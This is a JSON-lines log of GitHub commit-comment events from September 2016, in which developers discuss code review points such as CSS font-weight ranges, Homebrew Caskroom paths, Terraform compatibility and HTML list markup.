{"id":"4582525864","type":"CommitCommentEvent","actor":{"login":"xavfernandez"},"repo":{"name":"Polyconseil/sphinx-dust"},"payload":{"comment":{"id":19076664,"position":80,"line":80,"path":"dust/directive.py","commit_id":"af87a8b629cbce5fe3a3c88c1f661fd5982225ec","created_at":"2016-09-19T10:36:21Z","updated_at":"2016-09-19T10:36:21Z","body":"30 seems a little low for a default value (maybe 90 days ?)"}},"created_at":"2016-09-19T10:36:21Z"}
{"id":"4582527468","type":"CommitCommentEvent","actor":{"login":"ushkarev"},"repo":{"name":"ministryofjustice/money-to-prisoners-send-money"},"payload":{"comment":{"id":19076666,"position":29,"line":39,"path":"mtp_send_money/templates/send_money/bank-transfer.html","commit_id":"782c7de209196d9284238e94a1c3a990f9c32726","created_at":"2016-09-19T10:36:46Z","updated_at":"2016-09-19T10:36:46Z","body":"soz, but the element nesting here is now invalid html so the presentation is likely gonna be browser-specific. you can only put `li` directly in a `ul` or `ol`. if the list items need to be interspersed with other elements, you need to close the list element and the next one can [start numbering from the same counter using css](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Lists_and_Counters/Using_CSS_counters). also apparently you can try `start=\"2\"` but dunno if it work in older browsers."}},"created_at":"2016-09-19T10:36:46Z"}
{"id":"4582528217","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076669,"position":13,"line":758,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-19T10:36:58Z","updated_at":"2016-09-19T10:36:58Z","body":"Parse errors or clamping to the 1-999 range?\r\nIf the range might be expanded in a later OT spec then maybe parse error is better."}},"created_at":"2016-09-19T10:36:58Z"}
{"id":"4582529183","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19076671,"position":null,"line":null,"path":null,"commit_id":"4ec5e729c470bdad498777cd399e84cd461902eb","created_at":"2016-09-19T10:37:13Z","updated_at":"2016-09-19T10:37:13Z","body":"great, thanks!"}},"created_at":"2016-09-19T10:37:13Z"}
{"id":"4582529923","type":"CommitCommentEvent","actor":{"login":"saaj"},"repo":{"name":"bcb/jsonrpcclient"},"payload":{"comment":{"id":19076674,"position":null,"line":null,"path":null,"commit_id":"6196d5fa5f10cfbfcf093021e74742c80d9d171e","created_at":"2016-09-19T10:37:25Z","updated_at":"2016-09-19T10:37:25Z","body":"I think these warnings will mostly be seen by no one. `DeprecationWarning` is silenced by default. `unittest` (in Python 3) re-enables them in runtime. And you raise them at import time. I just recently touched this topic, see [here](http://stackoverflow.com/a/25509443/2072035). It's better to raise it in initialiser of `HTTPServer` and the like. `default` warning filter doesn't show it more than once per line of code anyway."}},"created_at":"2016-09-19T10:37:25Z"}
{"id":"4582531872","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076676,"position":13,"line":758,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-19T10:37:58Z","updated_at":"2016-09-19T10:37:58Z","body":"I'm discussing expanding the range with the OT group."}},"created_at":"2016-09-19T10:37:58Z"}
{"id":"4582533900","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19076677,"position":8,"line":44,"path":"resources/qml/Menus/ProfileMenu.qml","commit_id":"5c553d7bcd0d98e7910391a2a42c0bc24fca7892","created_at":"2016-09-19T10:38:29Z","updated_at":"2016-09-19T10:38:29Z","body":"The \"definition\" property gets replaced by menu.getFilter(), so there's no need to add it here (right?)"}},"created_at":"2016-09-19T10:38:29Z"}
{"id":"4582535375","type":"CommitCommentEvent","actor":{"login":"Polibuzz"},"repo":{"name":"Polibuzz/emojis"},"payload":{"comment":{"id":19076683,"position":38,"line":25,"path":"emoji/DefinitionViewController.swift","commit_id":"547551ddbf2a5c1c8d2a6736affc3d84e56ef86e","created_at":"2016-09-19T10:38:52Z","updated_at":"2016-09-19T10:38:52Z","body":"Misspelled \"Label\" here, but because the IBOutlet was already named, didn't feel like going back to change the Storyboard."}},"created_at":"2016-09-19T10:38:52Z"}
{"id":"4582535518","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076684,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-19T10:38:54Z","updated_at":"2016-09-19T10:38:54Z","body":"I tend to agree that ranges are needed. The problem with not having explicit ranges is that you don't know what the ranges are."}},"created_at":"2016-09-19T10:38:54Z"}
{"id":"4582540334","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076694,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T10:40:08Z","updated_at":"2016-09-19T10:40:08Z","body":"Yeah, a big problem with not adding ranges to @font-face descriptors is if you have a font which supports the entire range (1-999) (which is expected to be common), there is no way to make an @font-face block which will respond to requests for both weight 300 and weight 700."}},"created_at":"2016-09-19T10:40:08Z"}
{"id":"4582542887","type":"CommitCommentEvent","actor":{"login":"svgeesus"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076695,"position":null,"line":null,"path":null,"commit_id":"19da62ca0e80e24cdbbced4f27e261fe9c03fa60","created_at":"2016-09-19T10:40:43Z","updated_at":"2016-09-19T10:40:43Z","body":"I like these changes to the (unfortunately named, my bad) font-stretch mappings"}},"created_at":"2016-09-19T10:40:43Z"}
{"id":"4582546080","type":"CommitCommentEvent","actor":{"login":"Ch-Song"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19076698,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-19T10:41:28Z","updated_at":"2016-09-19T10:41:28Z","body":"farewell"}},"created_at":"2016-09-19T10:41:28Z"}
{"id":"4582546708","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19076700,"position":null,"line":null,"path":null,"commit_id":"862dcd5e5439852b9357424eb589603b30b10bcb","created_at":"2016-09-19T10:41:39Z","updated_at":"2016-09-19T10:41:39Z","body":"This isn't the only new packet added. Why?"}},"created_at":"2016-09-19T10:41:39Z"}
{"id":"4582551540","type":"CommitCommentEvent","actor":{"login":"andrey-legayev"},"repo":{"name":"ven-com/Magento-PageCache-powered-by-Varnish"},"payload":{"comment":{"id":19076704,"position":8,"line":194,"path":"app/code/community/Phoenix/VarnishCache/etc/default_3.0.vcl","commit_id":"b476250a35b5daf96c4b5287d6d7e0105d508e91","created_at":"2016-09-19T10:42:52Z","updated_at":"2016-09-19T10:42:52Z","body":"I did on purpose - to see those headers in debug mode"}},"created_at":"2016-09-19T10:42:52Z"}
{"id":"4582553426","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19076712,"position":7,"line":151,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T10:43:21Z","updated_at":"2016-09-19T10:43:21Z","body":"Indeed... 8adda02"}},"created_at":"2016-09-19T10:43:21Z"}
{"id":"4582555173","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19076717,"position":null,"line":null,"path":null,"commit_id":"862dcd5e5439852b9357424eb589603b30b10bcb","created_at":"2016-09-19T10:43:50Z","updated_at":"2016-09-19T10:43:50Z","body":"@SOF3 I was bored :P"}},"created_at":"2016-09-19T10:43:50Z"}
{"id":"4582556935","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19076719,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T10:44:16Z","updated_at":"2016-09-19T10:44:16Z","body":"CC @reitermarkus and @jawshooah that you may get some reports for the people who were migrated before this change about `brew list` not working. They can fix with `mv /usr/local/Caskroom /usr/local/Homebrew/Caskroom` or you could make that part of `brew cask` itself, perhaps. Sorry about that."}},"created_at":"2016-09-19T10:44:16Z"}
{"id":"4582566325","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19076741,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T10:46:37Z","updated_at":"2016-09-19T10:46:37Z","body":"As an annoying aside because I know you probably don't want to move this again: I think it makes sense to have this be relative to `HOMEBREW_PREFIX` or maybe even `HOMEBREW_CACHE` instead. We'd move `Cellar` from `HOMEBREW_PREFIX` to somewhere else if it didn't mean rebuilding all our binary packages and you folks don't have the same problem."}},"created_at":"2016-09-19T10:46:37Z"}
{"id":"4582566491","type":"CommitCommentEvent","actor":{"login":"manoreddy"},"repo":{"name":"manoreddy/EasePress"},"payload":{"comment":{"id":19076742,"position":null,"line":null,"path":null,"commit_id":"ebbf2d5fb7d1a825bda6face2e15ec2f1f8b312f","created_at":"2016-09-19T10:46:40Z","updated_at":"2016-09-19T10:46:40Z","body":"Added login credentials to the login page from server"}},"created_at":"2016-09-19T10:46:40Z"}
{"id":"4582571685","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19076748,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T10:48:01Z","updated_at":"2016-09-19T10:48:01Z","body":"In order to give ranges to these properties, we would have to figure out which one wins if the ranges overlap."}},"created_at":"2016-09-19T10:48:01Z"}
{"id":"4582573582","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19076753,"position":24,"line":245,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T10:48:32Z","updated_at":"2016-09-19T10:48:32Z","body":"Sure. I think the similar argument could be made for links within a page that goes to specific sections of a page, no additional value/info is given to crawlers, but it is still the semantically correct way of doing it. Opening a link to a same-page section in a new tab, or saving the link, would give the same benefit for time-code links in a video.\r\nHowever, since we don't have the possibility of linking to specific time-codes in a video I guess this point is invalid. Assuming that we had the ability to link to time-codes do you still think it should be an action/button or a link/anchor ?"}},"created_at":"2016-09-19T10:48:32Z"}
{"id":"4582580133","type":"CommitCommentEvent","actor":{"login":"JLHwung"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19076767,"position":10,"line":239,"path":"Library/Homebrew/cmd/update-report.rb","commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T10:50:17Z","updated_at":"2016-09-19T10:50:17Z","body":"It seems there should be a `,` after `\"Caskroom\"`."}},"created_at":"2016-09-19T10:50:17Z"}
{"id":"4582581164","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19076770,"position":5,"line":5305,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/XWiki.java","commit_id":"48bd7e92cf953010e5a6b1fd8dbd62d243e7c3cf","created_at":"2016-09-19T10:50:32Z","updated_at":"2016-09-19T10:50:32Z","body":"\"user id\" seems to be used more often on xwiki.org indeed."}},"created_at":"2016-09-19T10:50:32Z"}
{"id":"4582585580","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19076778,"position":10,"line":239,"path":"Library/Homebrew/cmd/update-report.rb","commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T10:51:39Z","updated_at":"2016-09-19T10:51:39Z","body":"Yeh, fixed in 13f08a2 but thanks."}},"created_at":"2016-09-19T10:51:39Z"}
{"id":"4582585645","type":"CommitCommentEvent","actor":{"login":"saaj"},"repo":{"name":"bcb/jsonrpcclient"},"payload":{"comment":{"id":19076779,"position":null,"line":null,"path":null,"commit_id":"5fa1f849096a5046d88b126c84b73c6e45bfdf44","created_at":"2016-09-19T10:51:40Z","updated_at":"2016-09-19T10:51:40Z","body":"Note that pip supports this syntax for extra deps: `pip install jsonrpcclient[requests]`. `requests` here is key in `extras_require` in `setup.py`."}},"created_at":"2016-09-19T10:51:40Z"}
{"id":"4582588741","type":"CommitCommentEvent","actor":{"login":"Wilsonator5000"},"repo":{"name":"Wilsonator5000/Neefertale"},"payload":{"comment":{"id":19076784,"position":null,"line":null,"path":null,"commit_id":"228f0a30331fb0cb47610109f9e34c687fc75956","created_at":"2016-09-19T10:52:28Z","updated_at":"2016-09-19T10:52:28Z","body":"Changed \"Sans\" to SAUCE!!!!1!1!1!!11!1!11"}},"created_at":"2016-09-19T10:52:28Z"}
{"id":"4582589802","type":"CommitCommentEvent","actor":{"login":"jollaman999"},"repo":{"name":"rachanta/racer-n5x"},"payload":{"comment":{"id":19076787,"position":null,"line":null,"path":null,"commit_id":"0bfbdf9c87614156c23e3dfebf0977247618f2c9","created_at":"2016-09-19T10:52:44Z","updated_at":"2016-09-19T10:52:44Z","body":"No just curious.\r\nAlso, I reverted f2fs-dev patches and back to stable branch with lazytime patch.\r\nIt looks more stable then upstream patches."}},"created_at":"2016-09-19T10:52:44Z"}
{"id":"4582590679","type":"CommitCommentEvent","actor":{"login":"wsaaaqqq1"},"repo":{"name":"wsaaaqqq/test"},"payload":{"comment":{"id":19076794,"position":null,"line":null,"path":null,"commit_id":"411d79854e3173813eeeb15dd868acabc14bf3f6","created_at":"2016-09-19T10:52:57Z","updated_at":"2016-09-19T10:52:57Z","body":"123"}},"created_at":"2016-09-19T10:52:57Z"}
{"id":"4582591739","type":"CommitCommentEvent","actor":{"login":"animeshtrivedi"},"repo":{"name":"animeshtrivedi/spark-terasort"},"payload":{"comment":{"id":19076797,"position":null,"line":null,"path":null,"commit_id":"a0569e3bf1645256630725733ff04b77578446c4","created_at":"2016-09-19T10:53:13Z","updated_at":"2016-09-19T10:53:13Z","body":"Done ! :)"}},"created_at":"2016-09-19T10:53:13Z"}
{"id":"4582592161","type":"CommitCommentEvent","actor":{"login":"ManushB"},"repo":{"name":"terraform-community-modules/tf_aws_ubuntu_ami"},"payload":{"comment":{"id":19076799,"position":5,"line":12,"path":"main.tf","commit_id":"4156b36f2f1ce4a301513f1599d3b60d33914fed","created_at":"2016-09-19T10:53:18Z","updated_at":"2016-09-19T10:53:18Z","body":"Using default value for lookup will fail the output ami id for terraform versions below 0.7 as default parameter was introduced in terraform 0.7. "}},"created_at":"2016-09-19T10:53:18Z"}
{"id":"4582594805","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":19076803,"position":null,"line":null,"path":null,"commit_id":"90a6827a32e58bf8c05d75051b18af8a01a540e0","created_at":"2016-09-19T10:53:57Z","updated_at":"2016-09-19T10:53:57Z","body":"test comment"}},"created_at":"2016-09-19T10:53:57Z"}
{"id":"4582599074","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19076805,"position":null,"line":null,"path":null,"commit_id":"70fbc3c8df5acddcee037dcfe8cbfaa3d7c9e8fe","created_at":"2016-09-19T10:55:00Z","updated_at":"2016-09-19T10:55:00Z","body":"Initial commit - Sep 19, 2016"}},"created_at":"2016-09-19T10:55:00Z"}
{"id":"4582600000","type":"CommitCommentEvent","actor":{"login":"elitezhe"},"repo":{"name":"ghspl/LearnPythonTheHardWay"},"payload":{"comment":{"id":19076806,"position":null,"line":null,"path":null,"commit_id":"6556721a556838ad4365a85fc291f018bd4fff07","created_at":"2016-09-19T10:55:15Z","updated_at":"2016-09-19T10:55:15Z","body":"see the attachment to know how to run the script\r\n\r\n[bandicam 2016-09-19 18-50-44-118.zip](https://github.com/ghspl/LearnPythonTheHardWay/files/479782/bandicam.2016-09-19.18-50-44-118.zip)\r\n"}},"created_at":"2016-09-19T10:55:15Z"}
{"id":"4582600710","type":"CommitCommentEvent","actor":{"login":"thomasfangyi"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19076807,"position":24,"line":24,"path":"docs/source/parameters.rst","commit_id":"5e3a6c1883bf4ed25762cd8282cf42839ff45f8b","created_at":"2016-09-19T10:55:26Z","updated_at":"2016-09-19T10:55:26Z","body":"That essentially makes TypedKey immutable in some sense, as once inserted once it cannot be changed easily.\r\nWould this be more preferable?"}},"created_at":"2016-09-19T10:55:26Z"}
{"id":"4582602544","type":"CommitCommentEvent","actor":{"login":"faucomte"},"repo":{"name":"faucomte/rapid-router"},"payload":{"comment":{"id":19076812,"position":null,"line":null,"path":null,"commit_id":"5dc5a7e0cfc3516c1a8f9fa290e670a9e0d675ad","created_at":"2016-09-19T10:55:54Z","updated_at":"2016-09-19T10:55:54Z","body":"This is a workaround for issue #834 where Python levels get stuck if there are more than 25 lines of code and the player has to scroll down to view them."}},"created_at":"2016-09-19T10:55:54Z"}
{"id":"4582607582","type":"CommitCommentEvent","actor":{"login":"shitala-cuelogic"},"repo":{"name":"tusharncuelogic/Training-Angular"},"payload":{"comment":{"id":19076818,"position":1,"line":1,"path":"app/directives/deletebutton/deletebutton.js","commit_id":"d316e2cabc7ca2f2165e0b86a369cafeeca5c23c","created_at":"2016-09-19T10:57:00Z","updated_at":"2016-09-19T10:57:00Z","body":"@tusharncuelogic Can you please tell me where are you using this directive and purpose of it. And Why are you using $window ?"}},"created_at":"2016-09-19T10:57:00Z"}
{"id":"4582608098","type":"CommitCommentEvent","actor":{"login":"ADmad"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19076820,"position":null,"line":null,"path":null,"commit_id":"5a68d07621987b4c27d061a3d04a6d1c8bce7f3c","created_at":"2016-09-19T10:57:09Z","updated_at":"2016-09-19T10:57:09Z","body":"Please open an issue instead of commenting on the commit."}},"created_at":"2016-09-19T10:57:09Z"}
{"id":"4582608235","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"saidinesh5/android_kernel_xiaomi_cancro"},"payload":{"comment":{"id":19076821,"position":null,"line":null,"path":null,"commit_id":"feccb4886bc8db2a587dc5ddbec9a88dbf7b55c6","created_at":"2016-09-19T10:57:11Z","updated_at":"2016-09-19T10:57:11Z","body":"No problems =) "}},"created_at":"2016-09-19T10:57:11Z"}
{"id":"4582609202","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19076825,"position":34,"line":86,"path":"src/gear/codepoint_translator.cc","commit_id":"c8970bea05405bf5e0d8e03a71ec9021bc94ee3f","created_at":"2016-09-19T10:57:23Z","updated_at":"2016-09-19T10:57:23Z","body":"@lotem `conv_to_utf`需要再傳一個charset參數，所以跟匿名函數converters不兼容了。"}},"created_at":"2016-09-19T10:57:23Z"}
{"id":"4582613041","type":"CommitCommentEvent","actor":{"login":"faucomte"},"repo":{"name":"faucomte/rapid-router"},"payload":{"comment":{"id":19076835,"position":null,"line":null,"path":null,"commit_id":"4a47afbba00e563ca561894c905f78f9c19dca80","created_at":"2016-09-19T10:58:12Z","updated_at":"2016-09-19T10:58:12Z","body":"The selenium tests needed something to tell when the solution had effectively been loaded in order to press the play button at the right time, without causing the test to fail.\r\nNow, pressing the 'Solve' button loads the solution after which a pop-up shows up prompting the user to view the solution."}},"created_at":"2016-09-19T10:58:12Z"}
{"id":"4582613431","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19076836,"position":24,"line":245,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T10:58:17Z","updated_at":"2016-09-19T10:58:17Z","body":"I see what you mean, and of course, if it's a link to a timecode it should be a link :-)\r\n\r\nI suggest we just leave it like this for now. The previous solution was a bit silly where the link to _#nowherespecial_ would display on hover."}},"created_at":"2016-09-19T10:58:17Z"}
{"id":"4582613952","type":"CommitCommentEvent","actor":{"login":"rachanta"},"repo":{"name":"rachanta/racer-n5x"},"payload":{"comment":{"id":19076839,"position":null,"line":null,"path":null,"commit_id":"0bfbdf9c87614156c23e3dfebf0977247618f2c9","created_at":"2016-09-19T10:58:23Z","updated_at":"2016-09-19T10:58:23Z","body":"I saw that, and took the changes to RACER. My kernel is now nougat latest base  android-7.0.0_r0.17 +  Franco delta + Cherry-picks from your work.\nThanks for your work."}},"created_at":"2016-09-19T10:58:23Z"}
{"id":"4582618613","type":"CommitCommentEvent","actor":{"login":"DelazJ"},"repo":{"name":"qgis/QGIS-Documentation"},"payload":{"comment":{"id":19076850,"position":6,"line":551,"path":"source/docs/user_manual/working_with_vector/supported_data.rst","commit_id":"9301a2b75f8ec77ac790cb4202fe5ca88adce858","created_at":"2016-09-19T10:59:23Z","updated_at":"2016-09-19T10:59:23Z","body":"@pcav, some comments:\r\n* These two lines should be indented and aligned with the \"Y\" of first line (and better break them at 80 characters\r\n* Also, use `-->` instead of `>`for the steps"}},"created_at":"2016-09-19T10:59:23Z"}
{"id":"4582621080","type":"CommitCommentEvent","actor":{"login":"jollaman999"},"repo":{"name":"rachanta/racer-n5x"},"payload":{"comment":{"id":19076855,"position":null,"line":null,"path":null,"commit_id":"0bfbdf9c87614156c23e3dfebf0977247618f2c9","created_at":"2016-09-19T10:59:59Z","updated_at":"2016-09-19T10:59:59Z","body":"Nice kernel! Thank you."}},"created_at":"2016-09-19T10:59:59Z"}
{"id":"4582622012","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19076856,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-19T11:00:16Z","updated_at":"2016-09-19T11:00:16Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.172](http://build.clear-measure.com/viewLog.html?buildId=10473&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-19T11:00:16Z"}
{"id":"4582622046","type":"CommitCommentEvent","actor":{"login":"annismckenzie"},"repo":{"name":"CloudyKit/goTemplateBenchmark"},"payload":{"comment":{"id":19076857,"position":null,"line":null,"path":null,"commit_id":"831a75c87cfd49490c437a47c1283bba9a7bfe06","created_at":"2016-09-19T11:00:16Z","updated_at":"2016-09-19T11:00:16Z","body":"👯 "}},"created_at":"2016-09-19T11:00:16Z"}
{"id":"4582623603","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19076858,"position":null,"line":null,"path":null,"commit_id":"46eb8088978027f8cd4790499013249c7c57cef8","created_at":"2016-09-19T11:00:28Z","updated_at":"2016-09-19T11:00:28Z","body":"#357"}},"created_at":"2016-09-19T11:00:28Z"}
{"id":"4582624512","type":"CommitCommentEvent","actor":{"login":"antonbabenko"},"repo":{"name":"terraform-community-modules/tf_aws_ubuntu_ami"},"payload":{"comment":{"id":19076859,"position":5,"line":12,"path":"main.tf","commit_id":"4156b36f2f1ce4a301513f1599d3b60d33914fed","created_at":"2016-09-19T11:00:40Z","updated_at":"2016-09-19T11:00:40Z","body":"You are right. master branch is always up-to-date with the latest stable version of Terraform. If you need to use this module with Terraform < 0.7, you should use tag [v1.0.0](https://github.com/terraform-community-modules/tf_aws_ubuntu_ami/tree/v1.0.0) . Note: new features are not going to back-ported to previous versions of Terraform."}},"created_at":"2016-09-19T11:00:40Z"}
{"id":"4582624970","type":"CommitCommentEvent","actor":{"login":"faucomte"},"repo":{"name":"faucomte/rapid-router"},"payload":{"comment":{"id":19076860,"position":null,"line":null,"path":null,"commit_id":"31225fa357c2ec972974117097761ad59c78406e","created_at":"2016-09-19T11:00:44Z","updated_at":"2016-09-19T11:00:44Z","body":"My bad. Fixes #836."}},"created_at":"2016-09-19T11:00:44Z"}
{"id":"4582626211","type":"CommitCommentEvent","actor":{"login":"carlson"},"repo":{"name":"mongodb/mongoid"},"payload":{"comment":{"id":19076861,"position":null,"line":null,"path":null,"commit_id":"3e87dab878847e0bdddcc3289d9de96cc04344e4","created_at":"2016-09-19T11:01:03Z","updated_at":"2016-09-19T11:01:03Z","body":"FYI: I had to add this fix in 3 places: https://github.com/connectedbits/mongoid/commit/fd079a31be40d48b065b82e293997b5637b85848"}},"created_at":"2016-09-19T11:01:03Z"}
{"id":"4582627300","type":"CommitCommentEvent","actor":{"login":"samukce"},"repo":{"name":"getsentry/raven-csharp"},"payload":{"comment":{"id":19076866,"position":null,"line":null,"path":null,"commit_id":"7000e25855934c712fb8cb0a7844b67b312cd85b","created_at":"2016-09-19T11:01:19Z","updated_at":"2016-09-19T11:01:19Z","body":"#159 done. o/"}},"created_at":"2016-09-19T11:01:19Z"}
{"id":"4582627877","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":19076867,"position":null,"line":null,"path":null,"commit_id":"90a6827a32e58bf8c05d75051b18af8a01a540e0","created_at":"2016-09-19T11:01:27Z","updated_at":"2016-09-19T11:01:27Z","body":"one more comment for e2e test"}},"created_at":"2016-09-19T11:01:27Z"}
{"id":"4582629516","type":"CommitCommentEvent","actor":{"login":"CoolGuyMC"},"repo":{"name":"KairusDarkSeeker/PrivateVaults"},"payload":{"comment":{"id":19076868,"position":null,"line":null,"path":null,"commit_id":"0bd8aeec9de722503498f3ea76e920b201df31e7","created_at":"2016-09-19T11:01:52Z","updated_at":"2016-09-19T11:01:52Z","body":"THIS ISN't EVEN YOUR OWN PLUGIN LMAO"}},"created_at":"2016-09-19T11:01:52Z"}
{"id":"4582630388","type":"CommitCommentEvent","actor":{"login":"DelazJ"},"repo":{"name":"qgis/QGIS-Documentation"},"payload":{"comment":{"id":19076869,"position":3,"line":548,"path":"source/docs/user_manual/working_with_vector/supported_data.rst","commit_id":"9301a2b75f8ec77ac790cb4202fe5ca88adce858","created_at":"2016-09-19T11:02:05Z","updated_at":"2016-09-19T11:02:05Z","body":"could you also replace `->` by `-->` here?"}},"created_at":"2016-09-19T11:02:05Z"}
{"id":"4582630461","type":"CommitCommentEvent","actor":{"login":"abitmore"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":19076870,"position":37,"line":133,"path":"libraries/chain/include/steemit/chain/witness_objects.hpp","commit_id":"6b593c2d8f09d55669e4dfc135937a3c902599f4","created_at":"2016-09-19T11:02:06Z","updated_at":"2016-09-19T11:02:06Z","body":"* Operator `++` on constants?\r\n* Should use `uint32_t fixed_string::size()` but not `sizeof(...)`?\r\n* I'm not sure if `end_of_string` is handled properly."}},"created_at":"2016-09-19T11:02:06Z"}
{"id":"4582632890","type":"CommitCommentEvent","actor":{"login":"faucomte"},"repo":{"name":"faucomte/rapid-router"},"payload":{"comment":{"id":19076876,"position":null,"line":null,"path":null,"commit_id":"4a47afbba00e563ca561894c905f78f9c19dca80","created_at":"2016-09-19T11:02:43Z","updated_at":"2016-09-19T11:02:43Z","body":"Also, I can't seem to type properly. Fixes #738."}},"created_at":"2016-09-19T11:02:43Z"}
{"id":"4582633661","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19076878,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T11:02:55Z","updated_at":"2016-09-19T11:02:55Z","body":"Don't try to compile the CommProto library with Csharp managed code. Instead, build CommProto with the CMakeLists.txt file that is located in the root directory (build your files in a folder whereever you want, i recommend a \"build\" folder). **THEN**, you should build the CMakeLists.txt file in csharp here, which will set everything up for you. The only thing you would need to do is specify the Additional Directory (in Linker) in Visual Studio, this is the location of wherever you built the CommProto library (wherever CommProtoStatic.lib is located, which should have been compiled before).   "}},"created_at":"2016-09-19T11:02:55Z"}
{"id":"4582634058","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19076880,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-19T11:03:02Z","updated_at":"2016-09-19T11:03:02Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.172](http://build.clear-measure.com/viewLog.html?buildId=10473&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:46"}},"created_at":"2016-09-19T11:03:02Z"}
{"id":"4582634139","type":"CommitCommentEvent","actor":{"login":"abitmore"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":19076882,"position":8,"line":50,"path":"libraries/chain/protocol/steem_operations.cpp","commit_id":"6b593c2d8f09d55669e4dfc135937a3c902599f4","created_at":"2016-09-19T11:03:03Z","updated_at":"2016-09-19T11:03:03Z","body":"This is a hard fork change."}},"created_at":"2016-09-19T11:03:03Z"}
